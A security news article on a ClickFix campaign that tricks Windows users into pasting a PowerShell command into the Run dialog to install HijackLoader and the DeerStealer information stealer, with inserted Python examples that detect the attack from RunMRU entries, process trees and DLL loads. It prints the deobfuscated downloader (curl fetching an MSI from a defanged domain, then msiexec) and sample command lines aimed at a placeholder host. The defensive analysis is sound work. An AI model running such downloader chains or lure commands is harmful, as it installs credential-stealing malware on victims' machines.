Threat Actors Abuse Windows Run Prompt to Execute Malicious Command and Deploy DeerStealer
Cybersecurity researchers have uncovered a sophisticated malware campaign that exploits Windows’ built-in Run prompt to deliver DeerStealer, a powerful information stealer designed to harvest cryptocurrency wallets, browser credentials, and sensitive personal data.
The malicious operation represents a concerning evolution in social engineering tactics, combining legitimate Windows functionality with advanced malware deployment techniques to bypass traditional security measures.
The attack campaign, which has been active throughout May 2025, employs a technique known as ClickFix to deceive victims into voluntarily executing malicious PowerShell commands through the Windows Run dialog box.
Victims are typically redirected to convincing phishing pages that present fake error messages or system notifications, prompting them to press Windows+R and paste a seemingly legitimate command to “resolve” the fabricated issue.
This approach effectively circumvents many security controls by leveraging the user’s own actions and trusted system processes.
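Because the victim types the command into the Run dialog, Windows records it in the per-user RunMRU registry key, which is the first artifact an analyst checks after a suspected ClickFix lure. The following is an added example (not eSentire's tooling or the article's code): it parses a constructed export of that key and flags entries that carry several launcher-style indicators at once. The sample values, the indicator list and the placeholder domain are all constructed for the example.

```python
import re

# Constructed export of HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
# (sample values, not data from the article). Each command value ends with the
# literal two characters "\1"; MRUList lists the value names, most recent first.
SAMPLE_RUNMRU = {
    "MRUList": "cdab",
    "a": "notepad\\1",
    "b": "cmd\\1",
    "c": 'powershell -w hidden -c "curl hxxps://example[.]invalid/now.msi '
         '-o $env:AppData\\now.msi; msiexec /i $env:AppData\\now.msi"\\1',
    "d": "\\\\fileserver\\share\\1",
}

# Indicators that a Run-dialog command looks like a pasted lure rather than a
# user opening a program. Each pattern carries the label reported for it.
INDICATORS = [
    (r"\bpowershell(\.exe)?\b|\bpwsh(\.exe)?\b", "powershell launched from Run"),
    (r"\s-(e|ec|enc|encodedcommand)\s", "encoded command"),
    (r"\s-w(indowstyle)?\s+hidden", "hidden window"),
    (r"\b(iex|invoke-expression)\b", "dynamic expression"),
    (r"\b(curl|wget|iwr|invoke-webrequest|bitsadmin|certutil)\b", "downloader"),
    (r"\bmsiexec(\.exe)?\b.*\s/i\b", "MSI install"),
    (r"\bmshta(\.exe)?\b", "mshta"),
]


def parse_run_mru(values):
    """Return (value_name, command) pairs in most-recent-first order,
    with the trailing "\\1" marker removed from each command."""
    ordered = []
    for name in values.get("MRUList", ""):
        raw = values.get(name)
        if raw is None:
            continue
        cmd = raw[:-2] if raw.endswith("\\1") else raw
        ordered.append((name, cmd))
    return ordered


def indicators_for(cmd):
    """Labels of every indicator pattern that matches the command (case-insensitive)."""
    return [label for pat, label in INDICATORS if re.search(pat, cmd, re.IGNORECASE)]


def flag_clickfix(values, min_indicators=2):
    """Report Run history entries with at least min_indicators hits; a single
    hit (a user simply typing 'powershell') is deliberately not reported."""
    findings = []
    for name, cmd in parse_run_mru(values):
        hits = indicators_for(cmd)
        if len(hits) >= min_indicators:
            findings.append({"value": name, "command": cmd, "indicators": hits})
    return findings


if __name__ == "__main__":
    for f in flag_clickfix(SAMPLE_RUNMRU):
        print(f"RunMRU\\{f['value']}: {', '.join(f['indicators'])}\n  {f['command']}")
```

On a live system the same dictionary can be built from `winreg` (or from a hive exported during triage) and fed to `flag_clickfix`; raising `min_indicators` trades recall for fewer false positives from administrators who really do launch PowerShell from the Run box.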
eSentire security analysts identified multiple attempts by threat actors to deploy this malware through their Threat Response Unit (TRU), revealing the campaign’s widespread nature and sophisticated technical implementation.
The researchers discovered that the malware, also known as XFiles, is being sold on dark web hacking forums by a user identified as “LuciferXfiles” through a subscription-based model ranging from $200 to $3000 per month, depending on the feature set and services provided.
DeerStealer represents a comprehensive data theft platform capable of extracting over 800 browser extension credentials, targeting cryptocurrency wallets across 14 different digital currencies, and harvesting data from popular applications including Discord, Telegram, Steam, and various VPN clients.
The malware’s extensive capabilities extend beyond simple credential theft, incorporating advanced features such as clipboard hijacking for cryptocurrency address substitution, hidden VNC access for remote desktop control, and sophisticated obfuscation techniques that generate payloads with only 50% similarity between samples.
The malware’s infrastructure utilizes a proxy domain system called “Gasket” to obscure the true command and control server locations while maintaining persistent communication channels.
This approach, combined with the malware’s ability to fingerprint victim machines using hardware identifiers and system timestamps, demonstrates the threat actors’ commitment to operational security and long-term campaign sustainability.
Advanced Infection Mechanism and Payload Deployment
The DeerStealer infection chain begins with the execution of an obfuscated PowerShell command that victims paste into the Windows Run prompt.
The decoded command reveals a sophisticated multi-stage deployment process that leverages living-off-the-land binaries to avoid detection.
The initial PowerShell script contains the following deobfuscated content:
$AqEVu = $env:AppData;                                        # AppData path; assigned but never used
function kWERDs($EIpoJdP, $wQmPq){curl $EIpoJdP -o $wQmPq};   # download a URL to a local file
function zPWQQKzb($CAvStqT){kWERDs $CAvStqT $wQmPq}           # wrapper; $wQmPq is read from script scope at call time
$wQmPq = $env:AppData + 'now.msi';                            # drop path (note: no path separator after AppData)
zPWQQKzb "hxxps://luckyseaworld[.]com/now.msi";               # fetch the MSI (URL defanged)
msiexec.exe /i $wQmPq;;                                       # hand the file to Windows Installer
This script utilizes the legitimate curl.exe utility to download a Microsoft Installer package named “now.msi” from a compromised or malicious domain, then executes it using the Windows Installer service.
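The chain above leaves a distinctive process tree: the Run dialog is serviced by explorer.exe, so the shell is a child of explorer.exe, and that shell then spawns both a downloader writing into a user-writable directory and msiexec.exe installing from the same place. The following is an added example (not the article's or eSentire's code) that walks constructed process-creation records modelled on Sysmon Event ID 1 fields (pid, ppid, image, cmdline are assumed field names) and reports shells that fit that pattern; the pids, paths and the placeholder domain are sample data.

```python
import ntpath

# Constructed process-creation records modelled on Sysmon Event ID 1 fields
# (sample data, not telemetry from the article). The pasted command is launched
# by explorer.exe, and the PowerShell child then runs the downloader and installer.
EVENTS = [
    {"pid": 1200, "ppid": 900, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 4000, "ppid": 1200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -c <pasted command>"},
    {"pid": 4100, "ppid": 4000, "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl hxxps://example[.]invalid/now.msi -o C:\Users\victim\AppData\Roamingnow.msi"},
    {"pid": 4200, "ppid": 4000, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Users\victim\AppData\Roamingnow.msi"},
    # Benign: an administrator's interactive shell started from a terminal app
    # (placeholder terminal path).
    {"pid": 3100, "ppid": 900, "image": r"C:\Program Files\Terminal\terminal.exe",
     "cmdline": "terminal.exe"},
    {"pid": 5000, "ppid": 3100, "image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "cmdline": "pwsh.exe"},
    # Benign: user double-clicks an MSI, so explorer launches msiexec directly.
    {"pid": 5200, "ppid": 1200, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Users\victim\Downloads\tool.msi"},
]

SHELLS = {"powershell.exe", "pwsh.exe"}
DOWNLOADERS = {"curl.exe", "certutil.exe", "bitsadmin.exe"}
# Locations a standard user can write to, where staged payloads usually land.
USER_WRITABLE = ("\\appdata\\", "\\programdata\\", "\\temp\\", "\\users\\public\\")


def basename(path):
    return ntpath.basename(path).lower()


def in_user_writable(text):
    return any(marker in text.lower() for marker in USER_WRITABLE)


def detect_run_prompt_chain(events):
    """One finding per shell spawned by explorer.exe (the Run dialog's parent)
    that then launched a downloader writing to, or an installer running from,
    a user-writable path. Both stages together raise the confidence."""
    by_pid = {e["pid"]: e for e in events}
    children = {}
    for e in events:
        children.setdefault(e["ppid"], []).append(e)

    findings = []
    for e in events:
        if basename(e["image"]) not in SHELLS:
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None or basename(parent["image"]) != "explorer.exe":
            continue
        stages = []
        for child in children.get(e["pid"], []):
            name = basename(child["image"])
            cl = child["cmdline"]
            if name in DOWNLOADERS and in_user_writable(cl):
                stages.append(f"download to user-writable path via {name}")
            elif name == "msiexec.exe" and "/i" in cl.lower() and in_user_writable(cl):
                stages.append("MSI install from user-writable path")
        if stages:
            findings.append({"shell_pid": e["pid"], "stages": stages,
                             "confidence": "high" if len(stages) > 1 else "medium"})
    return findings


if __name__ == "__main__":
    for f in detect_run_prompt_chain(EVENTS):
        print(f"shell pid {f['shell_pid']} ({f['confidence']}): " + "; ".join(f["stages"]))
```

The explorer.exe parent is what separates a Run-dialog launch from a scheduled task or a script host; without that record in the telemetry the rule stays silent, which is why the lineage must be kept along with the command lines.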
The MSI file serves as a dropper for HijackLoader, a sophisticated malware loader that emerged in 2023 and employs steganography to hide its configuration data within encrypted PNG images.
Once deployed, HijackLoader copies several files to the C:\ProgramData directory and executes a legitimate, digitally signed COMODO Internet Security binary that has been manipulated through DLL hijacking techniques.
The legitimate executable loads a malicious version of cmdres.dll, which contains hooks in the C runtime that redirect execution flow to the malware’s first stage, effectively using the trusted binary as a vehicle for malicious code execution while maintaining the appearance of legitimate system activity.
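The defensive signal in this stage is a trust mismatch: a signed executable running out of a user-writable directory loads a DLL from its own folder that is either unsigned or signed by someone else. The following is an added example (not the article's or eSentire's code) that applies that rule to constructed image-load records modelled on Sysmon Event ID 7; the field names, the host name "signed_vendor.exe" standing in for the abused security product binary, the directory names and the signer strings are all assumptions for the example. Only cmdres.dll is taken from the article.

```python
import ntpath

# Constructed image-load records modelled on Sysmon Event ID 7 fields (sample
# data; "signed_vendor.exe" is a placeholder for the abused signed binary).
IMAGE_LOADS = [
    # Signed host copied to ProgramData loads an unsigned DLL sitting beside it.
    {"process": r"C:\ProgramData\Staging\signed_vendor.exe", "process_signed": True,
     "process_signer": "Vendor Co",
     "image": r"C:\ProgramData\Staging\cmdres.dll", "image_signed": False, "image_signer": ""},
    # Same host loading a system DLL: expected.
    {"process": r"C:\ProgramData\Staging\signed_vendor.exe", "process_signed": True,
     "process_signer": "Vendor Co",
     "image": r"C:\Windows\System32\kernel32.dll", "image_signed": True,
     "image_signer": "Microsoft Windows"},
    # Properly installed application loading its own signed helper: expected.
    {"process": r"C:\Program Files\Vendor\app.exe", "process_signed": True,
     "process_signer": "Vendor Co",
     "image": r"C:\Program Files\Vendor\helper.dll", "image_signed": True,
     "image_signer": "Vendor Co"},
    # Signed host in AppData loading a DLL signed by someone else: lower severity.
    {"process": r"C:\Users\victim\AppData\Local\Tool\tool.exe", "process_signed": True,
     "process_signer": "Tool Ltd",
     "image": r"C:\Users\victim\AppData\Local\Tool\plugin.dll", "image_signed": True,
     "image_signer": "Other Corp"},
    # Unsigned developer build loading its own unsigned DLL: no borrowed trust.
    {"process": r"C:\Users\dev\AppData\Local\Build\test.exe", "process_signed": False,
     "process_signer": "",
     "image": r"C:\Users\dev\AppData\Local\Build\test.dll", "image_signed": False,
     "image_signer": ""},
]

USER_WRITABLE = ("\\appdata\\", "\\programdata\\", "\\temp\\", "\\users\\public\\")


def in_user_writable(path):
    return any(marker in path.lower() for marker in USER_WRITABLE)


def same_directory(a, b):
    return ntpath.dirname(a).lower() == ntpath.dirname(b).lower()


def detect_sideload(loads):
    """Flag a signed host in a user-writable directory that loads a DLL from
    its own directory when that DLL is unsigned (high) or carries a different
    signer (medium; legitimate third-party runtimes can also look like this)."""
    findings = []
    for rec in loads:
        if not rec["process_signed"]:
            continue                     # nothing trusted is being borrowed
        if not in_user_writable(rec["image"]) or not same_directory(rec["image"], rec["process"]):
            continue                     # system DLLs and installed apps fall through here
        if not rec["image_signed"]:
            severity, reason = "high", "unsigned DLL loaded from the signed host's own directory"
        elif rec["image_signer"] != rec["process_signer"]:
            severity, reason = "medium", "DLL signer differs from host signer"
        else:
            continue
        findings.append({"process": rec["process"], "image": rec["image"],
                         "severity": severity, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in detect_sideload(IMAGE_LOADS):
        print(f"[{f['severity']}] {f['process']} -> {f['image']}: {f['reason']}")
```

The same-directory condition is what ties the rule to sideloading rather than to every unsigned module a signed process ever touches; the severity split keeps bundled third-party runtimes reviewable without hiding the unsigned case.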